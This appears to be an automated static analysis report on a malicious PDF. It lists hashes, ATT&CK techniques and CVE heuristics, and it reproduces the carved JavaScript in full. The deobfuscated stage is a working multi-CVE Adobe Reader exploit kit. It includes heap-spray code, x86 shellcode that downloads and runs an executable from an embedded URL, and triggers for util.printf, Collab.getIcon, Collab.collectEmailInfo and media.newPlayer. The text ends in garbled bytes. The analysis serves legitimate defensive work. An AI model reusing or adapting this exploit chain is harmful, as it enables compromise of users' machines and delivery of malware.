Malicious PDF — malware analysis report

Static analysis result for SHA-256 89b43433371e9269…

Verdict: MALICIOUS
File type: PDF

Size: 5.2 KB
Authoring application: Gisewouefirixahani (via 9617aNhowocsepacevajija)
First seen: 2026-05-10
MD5: 1ecc4b0af7f32569034290fc486592af
SHA-1: f388c862038f215057bbbbce0dc21db83858e02f
SHA-256: 89b43433371e9269cc35ef6fc48553b46f119555a5dc094b0b04ece2c13fd977
Risk Score: 468

Malware Insights

MITRE ATT&CK
  • T1059.007 JavaScript
  • T1203 Exploitation for Client Execution
  • T1566.001 Spearphishing Attachment

The PDF file contains embedded JavaScript that leverages multiple known Adobe Reader vulnerabilities (CVE-2009-4324, CVE-2009-0927, CVE-2008-2992) to execute arbitrary code. The deobfuscated JavaScript attempts to download a second-stage payload from the URL http://ahrudz.egh/4. This indicates a typical exploit delivery mechanism for a malicious PDF.

Machine Learning

  • Nyx PDF Classifier: malicious score 1.0000

Heuristics (10)

  • media.newPlayer — CVE-2009-4324 [critical; CVE exact; rule CVE_2009_4324]
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 [critical; CVE exact; rule CVE_2009_0927]
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 [critical; CVE exact; rule CVE_2008_2992]
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher [critical; CVE likely; rule PDF_PIDIEF_MULTI_CVE_DISPATCH]
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit [critical; rule PDF_ADOBE_READER_MULTI_CVE_JS_KIT]
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action [low; 2 related findings; rule PDF_JAVASCRIPT]
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster [critical; rule PDF_JS_EXPLOIT_CLUSTER]
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script:
    var commandLine={};
    commandLine.value='varO kR~O = 157O ;var fQ ~~=~L this;Lvar wF=\'OgeOtPa\'+\'geN~~t~OhW\'+\'OOord\';vLar hQ=\'OLgeLtP\'+O\'ag~LeNuOO\'OO+O~\'mWor\'+\'ds\';~var aD=\'from\'+\'CharCo\'+\'de\';OvaLr dM=~~\'pa~Lg~OeNO\'+\'um\';var cLZ=LfQ[~LhQ](fOOQ[dM]);var dLQ=\'\';fLor(va~Or qJL=0O;qJ<~ ~OcZ; ~qJ++){dQL=[dQ,fQ[wF](~fQ[dMLO],qJL,t~rueOL)].join(~\'\'~)~~;;~}varO jLQ=\'\';for(va~Or q~OJ=0;~qJ < dQ.length; qJ+=2)L{dWN=dQ.sLOubstr(qJ,2);jQ=[jQ,StringOL[aD](parLseInt(dW~N,~16)^kR)].join(\'\');O}~Oeval(
  • Embedded JS stream [low; rule PDF_JS]
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact [medium; rule EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info; rule EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://ahrudz.egh/4 (referenced by PDF JavaScript)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: javascript_obj0010_000.js
Kind: pdf-javascript-stream
Source: PDF /JS object 10 at offset 0xF5C
Size: 813 bytes
SHA-256: 89950d83de673b46701d1e57750e501383864f14a9095874aca71e9ad824f436
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script (first 1,000 lines of the extracted script):
var commandLine={};
commandLine.value='varO kR~O = 157O ;var fQ ~~=~L this;Lvar wF=\'OgeOtPa\'+\'geN~~t~OhW\'+\'OOord\';vLar hQ=\'OLgeLtP\'+O\'ag~LeNuOO\'OO+O~\'mWor\'+\'ds\';~var aD=\'from\'+\'CharCo\'+\'de\';OvaLr dM=~~\'pa~Lg~OeNO\'+\'um\';var cLZ=LfQ[~LhQ](fOOQ[dM]);var dLQ=\'\';fLor(va~Or qJL=0O;qJ<~ ~OcZ; ~qJ++){dQL=[dQ,fQ[wF](~fQ[dMLO],qJL,t~rueOL)].join(~\'\'~)~~;;~}varO jLQ=\'\';for(va~Or q~OJ=0;~qJ < dQ.length; qJ+=2)L{dWN=dQ.sLOubstr(qJ,2);jQ=[jQ,StringOL[aD](parLseInt(dW~N,~16)^kR)].join(\'\');O}~Oeval(jOQ);jQ=null;OO'.replace(/[OL~]/g, '');

try {
evalCommandLine();
} catch(e){

}

function evalCommandLine()
{
    var text = commandLine.value;
    commandLine.value = "";
    var value;
    try
    {
        value = eval(text);
    }
    catch (exc)
    {
    }

    console.log(value);
}
Filename: legacy_pdfkit_stage_000.js
Kind: deobfuscated-js
Source: getPageWords-XOR Pidief stage normalized at offset 0x0
Size: 4885 bytes
SHA-256: 85413f35eb0de96b627b2b12221de9472e37464c8960169c5d09dfef389bf23c
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long hex-escaped blob(s).
Preview script (first 1,000 lines of the extracted script):
l=["iT","h"];vI=["d","dW"];var pU={p:"b".substr(13939)};var dK='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/.:_-?&=%#';yF={r:false};this.fU=false;var yL=this.info['z'].replace(/[\s]/g, '');var vQ={bO:"aT".substr(4267, 4267)};var dE={lE:"oP".substr(9591, 9591)};var vS = this.info;var aR = (vS.producer.substr(0,5) == 'debug');var jI = new Array(); var yJ = "%u";function lK(str){str = str.split(yJ);var ret="";for(var i in str){if(str[i] != "")ret += String.fromCharCode(parseInt(str[i],16));}return ret;}function eX(str1, str2){return [str1, str2].join("");}function vM(uJ){var dKF = dC();var aJU = gF();dKF += ((dKF.indexOf("?") > -1) ? "&" : "?") + "reader_version=" + aJU;if(aR) app.alert("URL: " + dKF);var d=yJ;var dWN="\x50\x53\x51\x52\x56\x57\x55\x9C\xE8\x00\x00\x00\x00\x5D\x83\xED\x0D\x31\xC0\x64\x03\x40\x30\x78\x10\x8B\x40\x0C\x8B\x70\x14\xAD\x89\xC0\x89\xC0\x8B\x40\x10\xEB\x09\x8B\x40\x34\x8D\x40\x7C\x8B\x40\x3C\x56\x57\xBE\xE2\x00\x00\x00\x01\xEE\xBF\xD2\x00\x00\x00\x01\xEF\xE8\x56\x01\x00\x00\x5F\x5E\x89\xEA\x81\xC2\xE2\x00\x00\x00\x52\x68\x80\x00\x00\x00\xFF\x95\xD2\x00\x00\x00\x89\xEA\x81\xC2\xE2\x00\x00\x00\x31\xF6\x01\xC2\x8A\x9C\x35\xE7\x01\x00\x00\x80\xFB\x00\x74\x06\x88\x1C\x32\x46\xEB\xEE\xC6\x04\x32\x00\x89\xEA\x81\xC2\xC9\x01\x00\x00\x52\xFF\x95\xD6\x00\x00\x00\x89\xEA\x81\xC2\xD4\x01\x00\x00\x52\x50\xFF\x95\xDA\x00\x00\x00\x6A\x00\x6A\x00\x89\xEA\x81\xC2\xE2\x00\x00\x00\x52\x89\xEA\x81\xC2\xF4\x01\x00\x00\x52\x6A\x00\xFF\xD0\x6A\x05\x89\xEA\x81\xC2\xE2\x00\x00\x00\x52\xFF\x95\xDE\x00\x00\x00\x9D\x5D\x5F\x5E\x5A\x59\x5B\x58\xC3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x47\x65\x74\x54\x65\x6D\x70\x50\x61\x74\x68\x41\x00\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x00\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x00\x57\x69\x6E\x45\x78\x65\x63\x00\xBB\x89\xF2\x89\xF7\x30\xC0\xAE\x75\xFD\x29\xF7\x89\xF9\x31\xC0\xBE\x3C\x00\x00\x00\x03\xB5\x9F\x01\x00\x00\x66\xAD\x03\x85\x9F\x01\x00\x00\x8B\x70\x78\x8
3\xC6\x1C\x03\xB5\x9F\x01\x00\x00\x8D\xBD\xA3\x01\x00\x00\xAD\x03\x85\x9F\x01\x00\x00\xAB\xAD\x03\x85\x9F\x01\x00\x00\x50\xAB\xAD\x03\x85\x9F\x01\x00\x00\xAB\x5E\x31\xDB\xAD\x56\x03\x85\x9F\x01\x00\x00\x89\xC6\x89\xD7\x51\xFC\xF3\xA6\x59\x74\x04\x5E\x43\xEB\xE9\x5E\x93\xD1\xE0\x03\x85\xAB\x01\x00\x00\x31\xF6\x96\x66\xAD\xC1\xE0\x02\x03\x85\xA3\x01\x00\x00\x89\xC6\xAD\x03\x85\x9F\x01\x00\x00\xC3\xEB\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x89\x85\x9F\x01\x00\x00\x56\x57\xE8\x58\xFF\xFF\xFF\x5F\x5E\xAB\x01\xCE\x80\x3E\xBB\x74\x02\xEB\xED\xC3\x55\x52\x4C\x4D\x4F\x4E\x2E\x44\x4C\x4C\x00\x55\x52\x4C\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x54\x6F\x46\x69\x6C\x65\x41\x00\x31\x32\x33\x34\x35\x36\x37\x38\x2E\x65\x78\x65\x00";dWN+=dKF;dWN+="\x00\x90";return dWN;};function dC(){var zA = (vS.author + vS.title).replace(/[\s]/g, '');var aF = nC(zA, yL, dK);return aF;};function nC(zA, dK, yL){var aF="";for(var i=0; i < zA.length; i++){var aL = dK.indexOf(zA[i]);if(aL > -1 ){aF += yL[aL];}}return aF;};function jS(zA){var out = "";zA = eB(zA);g = Math.round(zA.length / 4);if (g != zA.length /4) zA+="00";for(var i=0; i < zA.length; i+=4){out+= yJ + zA.substr(i+2, 2) + zA.substr(i, 2);}return out;};function eB(s){var i, f = 0, a = [];s += '';f = s.length;for (i = 0; i<f; i++) {a[i] = s.charCodeAt(i).toString(16).replace(/^([\da-f])$/,"0$1").toUpperCase();}return a.join('');};function t(xE, len){while (xE.length * 2 < len){xE = eX(xE, xE);}return xE.substring(0, len / 2);};function mJ(fS){var aTW = 0x0c0c0c0c;        sJ = vM("pdf");if (fS == 1){aTW = 0x30303030;}var bM = 0x400000;var ln = sJ.length * 2;var gL = bM - (ln + 0x38);var xE = lK(yJ+"9090"+yJ+"9090"); xE = t(xE, gL);var vE = (aTW - 0x400000) / bM;for (var eXY = 0; eXY < vE; eXY ++ ){jI[eXY] = eX(xE, sJ);}};function gF(){try {return app.viewerVersion.toString();}catch(wV){    return 0;}}if(aR) app.alert("called exploit");var aJU = gF();if(aR)  app.alert("v: " + aJU);if (aJU > 8){if(aR) 
app.alert("util.printf");mJ(1);var zQ = "12999999999999999999";for (uD=0; uD < 276; uD++) zQ += "8";util.printf("%45000f", zQ);}if (aJU < 8){if(aR) app.alert("Collab.collectEmailInfo");mJ(0);var zWT = lK(yJ+"0c0c"+yJ+"0c0c");while (zWT.length < 44952) zWT += zWT;this.collabStore = Collab.collectEmailInfo({ subj : "", msg : zWT});}if (aJU < 9.1){if (app.doc.Collab.getIcon){if(aR) app.alert("Collab.getIcon");mJ(0);var tK = unescape("%09");while (tK.length < 0x4000) tK += tK;tK = "N." + tK;app.doc.Collab.getIcon(tK);}}if (aJU == 9.2){if(aR) app.alert("media.newPlayer");mJ(1);var sf="1.000000000.000000000.1337 : 3.13.37";util.printd(sf, new Date());try {media.newPlayer(null);} catch(e) {}util.printd(sf, new Date());}this.vC=25211;this.vC+=185;try {var zW='yT'.substring(6215)} catch(zW){};try {var pK='oJ'.substring(6611)} catch(pK){};try {var yTY='cV'.substring(21279)} catch(yTY){};rC`rC`rC͍����'